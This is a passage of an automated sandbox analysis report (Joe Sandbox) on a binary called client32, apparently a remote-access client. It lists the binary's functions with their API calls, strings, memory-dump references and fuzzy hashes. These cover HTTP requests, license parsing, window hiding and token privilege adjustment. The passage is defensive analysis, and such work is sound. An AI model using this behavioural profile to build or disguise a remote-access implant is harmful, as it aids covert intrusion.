SetLastError.KERNEL32(00000078), ref: 11029D84
SetLastError.KERNEL32(00000078), ref: 11029D91
SetLastError.KERNEL32(00000078), ref: 11029D9B
_free.LIBCMT ref: 11029DA5

Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD

GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029E25
SetLastError.KERNEL32(00000078), ref: 11029E3E
GetProcAddress.KERNEL32(?,InternetConnectA), ref: 11029E51
InternetConnectA.WININET(000000FF,1119A6C0,00000050,00000000,00000000,00000003,00000000,00000000), ref: 11029E6E
GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029E8A
SetLastError.KERNEL32(00000078), ref: 11029EA3
GetProcAddress.KERNEL32(?,HttpOpenRequestA), ref: 11029EC9
GetProcAddress.KERNEL32(?,HttpSendRequestA), ref: 11029F1D
GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 1102A083
SetLastError.KERNEL32(00000078), ref: 1102A150
GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 1102A1A2
SetLastError.KERNEL32(00000078), ref: 1102A1B9
FreeLibrary.KERNEL32(?), ref: 1102A1CA

Strings

InternetConnectA, xrefs: 11029E4B
WinInet.dll, xrefs: 11029BDD
InternetQueryDataAvailable, xrefs: 1102A07D
InternetOpenA, xrefs: 11029D55
://, xrefs: 11029DC5
InternetErrorDlg, xrefs: 11029FC0
GET, xrefs: 11029EE9
InternetCloseHandle, xrefs: 11029C79, 11029E1F, 11029E84, 1102A19C
HttpQueryInfoA, xrefs: 11029F63
HttpOpenRequestA, xrefs: 11029EC3
InternetQueryOptionA, xrefs: 11029CCB, 11029D1B
HttpSendRequestA, xrefs: 11029F17

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorLast$FreeInternetLibrary_free_malloc$ConnectHeapLoadOpen
String ID: ://$GET$HttpOpenRequestA$HttpQueryInfoA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetErrorDlg$InternetOpenA$InternetQueryDataAvailable$InternetQueryOptionA$WinInet.dll
API String ID: 921868004-913974648
Opcode ID: fdbdbda9e1d813da9675ceccfd2c9c36ae8d492f7c40484b8121e6de466b6977
Instruction ID: fedf281c9ee5d08c3a8f43e513d3e5c088d5a5ed6dab1fd82504b865b87691ba
Opcode Fuzzy Hash: fdbdbda9e1d813da9675ceccfd2c9c36ae8d492f7c40484b8121e6de466b6977
Instruction Fuzzy Hash: 8012AC70D40229DBEB11DFE5CC88AAEFBF8FF88754F604169E425A7600EB745980CB60

Function 110627B0 Relevance: 76.5, APIs: 22, Strings: 21, Instructions: 1221COMMON

Download Yara Rule

APIs

Part of subcall function 11145A70: GetLastError.KERNEL32(?,00000000,000000FF,?), ref: 11145AA5
Part of subcall function 11145A70: Sleep.KERNEL32(000000C8,?,?,?,?,?,?,00000000,000000FF,?), ref: 11145AB5

_fgets.LIBCMT ref: 110628E2
_strpbrk.LIBCMT ref: 11062949
_fgets.LIBCMT ref: 11062A4C
_strpbrk.LIBCMT ref: 11062AC3
__wcstoui64.LIBCMT ref: 11062ADC
_fgets.LIBCMT ref: 11062B55
_strpbrk.LIBCMT ref: 11062B7B

Strings

shrink_wrap, xrefs: 11063156
licensee, xrefs: 11063573
defaults, xrefs: 11062C36
?expirY, xrefs: 11063288
%s.%04d.%s, xrefs: 11062DC9
_version, xrefs: 11062F49
enforce, xrefs: 11062C56
inactive, xrefs: 110630D1
expiry, xrefs: 11063250
Expired, xrefs: 1106348B
start, xrefs: 11063259, 11063270
/- , xrefs: 1106331E, 11063351, 11063384
?starT, xrefs: 11063291, 1106329D
ACM, xrefs: 110631B7
_License, xrefs: 11062E76, 11062F34, 11062F4E, 110630D6, 11063140, 1106315B, 11063177, 11063271, 11063490, 11063578
_include, xrefs: 11062CE9
%c%04d%s, xrefs: 11062CA4
_checksum, xrefs: 11062F2F
cd_install, xrefs: 1106313B
Client, xrefs: 11062D82, 11062DC4
product, xrefs: 11063172

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _fgets_strpbrk$ErrorLastSleep__wcstoui64
String ID: %c%04d%s$%s.%04d.%s$/- $?expirY$?starT$ACM$Client$Expired$_License$_checksum$_include$_version$cd_install$defaults$enforce$expiry$inactive$licensee$product$shrink_wrap$start
API String ID: 716802716-1571441106
Opcode ID: 331213c4ead450b5d9572f09714e784bc8a225cd8e9db223fb3838c6d78684b6
Instruction ID: a72cdd11ea0a2970362cd59f127853d680cd45206dcb20ec64d0abc9fb05f950
Opcode Fuzzy Hash: 331213c4ead450b5d9572f09714e784bc8a225cd8e9db223fb3838c6d78684b6
Instruction Fuzzy Hash: 7DA2C475E0465A9FEB11CF64DC40BEFB7B8AF44345F0441D8E849AB280EB71AA45CF91

Function 11139ED0 Relevance: 54.7, APIs: 20, Strings: 11, Instructions: 474
windowthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 11139F07
IsWindow.USER32(0002045A), ref: 11139F65
IsWindowVisible.USER32(0002045A), ref: 11139F73
IsWindowVisible.USER32(0002045A), ref: 11139FAB
GetForegroundWindow.USER32 ref: 11139FC6
EnableWindow.USER32(0002045A,00000000), ref: 11139FE0
EnableWindow.USER32(0002045A,00000001), ref: 11139FFC
SetForegroundWindow.USER32(00000000), ref: 1113A00B
FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 1113A049
IsWindowVisible.USER32(00000000), ref: 1113A058
IsWindowVisible.USER32(0002045A), ref: 1113A088
IsIconic.USER32(0002045A), ref: 1113A095
GetForegroundWindow.USER32 ref: 1113A09F

Part of subcall function 11132120: ShowWindow.USER32(0002045A,00000000,?,11139EA2,00000007,?,?,?,?,?,00000000), ref: 11132144

Part of subcall function 11132120: ShowWindow.USER32(0002045A,11139EA2,?,11139EA2,00000007,?,?,?,?,?,00000000), ref: 11132156

SetForegroundWindow.USER32(00000000), ref: 1113A0C5
EnableWindow.USER32(0002045A,00000001), ref: 1113A0D4
GetLastError.KERNEL32 ref: 1113A193
GetLastError.KERNEL32 ref: 1113A20B
GetTickCount.KERNEL32 ref: 1113A4B8
GetTickCount.KERNEL32 ref: 1113A4D9

Part of subcall function 110261A0: LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,1113A522), ref: 110261A8

FreeLibrary.KERNEL32(?,00000000,000000FF,00000000,00000001,00000000,00000001,00000000,0000000A,?,00000000), ref: 1113A574

Strings

HideWhenIdle, xrefs: 11139F94
File <%s> doesnt exist, e=%d, xrefs: 1113A197, 1113A20F
Audio, xrefs: 1113A295
MainWnd = %08x, visible %d, valid %d, xrefs: 11139F7D
Client, xrefs: 11139F99, 1113A11D, 1113A47B
Shell_TrayWnd, xrefs: 1113A044
HookDirectSound, xrefs: 1113A290
ShowNeedsReinstall in 15, user=%s, xrefs: 1113A4AB
disableRunplugin, xrefs: 1113A118
Reactivate main window, xrefs: 11139FB9
NeedsReinstall, xrefs: 1113A476

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$ForegroundVisible$Enable$CountErrorLastLibraryShowTick$CurrentFindFreeIconicLoadThread
String ID: Audio$Client$File <%s> doesnt exist, e=%d$HideWhenIdle$HookDirectSound$MainWnd = %08x, visible %d, valid %d$NeedsReinstall$Reactivate main window$Shell_TrayWnd$ShowNeedsReinstall in 15, user=%s$disableRunplugin
API String ID: 2511061093-2542869446
Opcode ID: d2c277f1efcbfe15d5673ed47da229280ab303ea4c79ec1b301778a1da1a73c4
Instruction ID: 9ececd2581658abecd2b9d282a3ee437682ea2591524154b6e9732358788741a
Opcode Fuzzy Hash: d2c277f1efcbfe15d5673ed47da229280ab303ea4c79ec1b301778a1da1a73c4
Instruction Fuzzy Hash: FC023675E11226DFE716DFA4DD94BAAFB65BBC131EF140138E4219728CEB30A844CB91

Function 11145C70 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 175registryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetVersionExA.KERNEL32(111F1EF0,75A38400), ref: 11145CA0
RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
_memset.LIBCMT ref: 11145CFD

Part of subcall function 11143BD0: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1111025B,75A38400,?,?,11145D2F,00000000,CSDVersion,00000000,00000000,?), ref: 11143BF0

_strncpy.LIBCMT ref: 11145DCA

Part of subcall function 111648ED: __isdigit_l.LIBCMT ref: 11164912

RegCloseKey.KERNEL32(00000000), ref: 11145E66

Strings

CSDVersion, xrefs: 11145D1A
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 11145CCB
CurrentMinorVersionNumber, xrefs: 11145E30
Service Pack, xrefs: 11145EAD
CurrentVersion, xrefs: 11145D44
CurrentMajorVersionNumber, xrefs: 11145DF8

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValueVersion__isdigit_l_memset_strncpy
String ID: CSDVersion$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Service Pack
API String ID: 3299820421-2117887902
Opcode ID: 929fb5d8b7f52e0b88e664298c84f703fc5a1542ba09115f26204fab96234c05
Instruction ID: 72e9b589e9c81c7730d33f5d85faf9c496c6ad46d8e7039c924549f2bc0033ac
Opcode Fuzzy Hash: 929fb5d8b7f52e0b88e664298c84f703fc5a1542ba09115f26204fab96234c05
Instruction Fuzzy Hash: A4510871E0023BABDB21CF61CD41FDEF7B9AB01B0CF1040A9E91D66945E7B16A49CB91

Function 11116880 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 182librarycomloaderCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 111168D5
CoCreateInstance.OLE32(111C1AAC,00000000,00000001,111C1ABC,00000000,?,00000000,Client,silent,00000000,00000000,?,1104C49F), ref: 111168EF
LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000000,Client,silent,00000000,00000000), ref: 11116914
GetProcAddress.KERNEL32(00000000,SHGetSettings), ref: 11116926
SHGetSettings.SHELL32(?,00000200,?,00000000,Client,silent,00000000,00000000), ref: 11116939
FreeLibrary.KERNEL32(00000000,?,00000000,Client,silent,00000000,00000000), ref: 11116945
CoUninitialize.COMBASE(00000000), ref: 111169E1

Strings

SHELL32.DLL, xrefs: 11116905
SHGetSettings, xrefs: 11116920

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Library$AddressCreateFreeInitializeInstanceLoadProcSettingsUninitialize
String ID: SHELL32.DLL$SHGetSettings
API String ID: 4195908086-2348320231
Opcode ID: 7f4dfa4f84449ddd9057b5d12e5b7092daec7eaad03784577530b65d584c16e3
Instruction ID: 86b6e15c13bd198e2be1b4906c6dc8e983a2f790f9ea6f3073e45f268e972f68
Opcode Fuzzy Hash: 7f4dfa4f84449ddd9057b5d12e5b7092daec7eaad03784577530b65d584c16e3
Instruction Fuzzy Hash: 81515175A00219AFDB00DFA5C9C0EAFFBB9EF48304F114969E915AB244E771A941CB61

Function 11073680 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 314COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 110737B0
_memset.LIBCMT ref: 11073929

Strings

_License, xrefs: 11073771
NBCTL32.DLL, xrefs: 11073865
serial_no, xrefs: 1107376C

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _memset
String ID: NBCTL32.DLL$_License$serial_no
API String ID: 2102423945-35127696
Opcode ID: 19c1bfdd6460f6a249e12eea9a2a20caa138c9ba89d8b6a2a5b87a7590f55589
Instruction ID: b632ae2d06a9e035363f4f75e6ccaf6c516ded967162c2d69bbdd490d26a7599
Opcode Fuzzy Hash: 19c1bfdd6460f6a249e12eea9a2a20caa138c9ba89d8b6a2a5b87a7590f55589
Instruction Fuzzy Hash: A8B18075E04209ABE714CF98DC81FEEB7F5FF88304F158169E9499B285DB71A901CB90

Function 1109ED30 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,11030346,?,00000000), ref: 1109ED68
GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109ED84
AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00EB2860,00EB2860,00EB2860,00EB2860,00EB2860,00EB2860,00EB2860,`(,?,00000001,00000001), ref: 1109EDB0
EqualSid.ADVAPI32(?,00EB2860,?,00000001,00000001), ref: 1109EDC3

Strings

`(, xrefs: 1109ED8A, 1109ED93, 1109EDB6

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: InformationToken$AllocateEqualInitialize
String ID: `(
API String ID: 1878589025-1319497050
Opcode ID: 4b61cf4af713a4b82f6fb566942020194785977790fe51c73b26fe6fb189ff5a
Instruction ID: f2a8bc8f74b1de347afb3cb87d534257ea472b44b3b43d4353705adbfce15ac3
Opcode Fuzzy Hash: 4b61cf4af713a4b82f6fb566942020194785977790fe51c73b26fe6fb189ff5a
Instruction Fuzzy Hash: DF213031B0122EABEB10DA98DD95BFEB7B8EB44704F014169E929DB180E671AD10D791

Function 11031780 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(1102EA50,?,00000000), ref: 110317A4

Strings

NSMWClass, xrefs: 110317AF
NSMWClass, xrefs: 110317C3
Client32, xrefs: 11031784

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID: Client32$NSMWClass$NSMWClass
API String ID: 3192549508-611217420
Opcode ID: c961f33892060384102c2ee032c69d83171ddabd259de90cbdfd1f05e760a560
Instruction ID: 804cb5d527221f69a992b866d17bc63a828f9d1c02720c4f1a032ef46c9a5584
Opcode Fuzzy Hash: c961f33892060384102c2ee032c69d83171ddabd259de90cbdfd1f05e760a560
Instruction Fuzzy Hash: C1F04F7890222ADFC30ADF95C995A59B7F4BB8870CB108574D43547208EB3179048B99

Function 1109D860 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(000F01FF,?,11030703,00000000,00000000,00080000,0BAD89F8,00080000,00000000,?), ref: 1109D88D
OpenProcessToken.ADVAPI32(00000000), ref: 1109D894
LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109D8A5
AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109D8C9

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
String ID:
API String ID: 2349140579-0
Opcode ID: b1ebb33d0097c2b27741ff61215e6ff8e180ff04b55af2e4c570c349c4c69e7c
Instruction ID: 81f12928af7d2c66371a758247fa27ee71cd04b85772abc6619dfc746b0a2552
Opcode Fuzzy Hash: b1ebb33d0097c2b27741ff61215e6ff8e180ff04b55af2e4c570c349c4c69e7c
Instruction Fuzzy Hash: 4F018CB2640218ABE710DFA4CD89BABF7BCEB04705F004429E91597280D7B06904CBB0

Function 1109D8F0 Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,00000000,?,?,00000000,00000000,00000000,1109EC30,00000244,cant create events), ref: 1109D90C
CloseHandle.KERNEL32(?,00000000,1109EC30,00000244,cant create events), ref: 1109D915

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
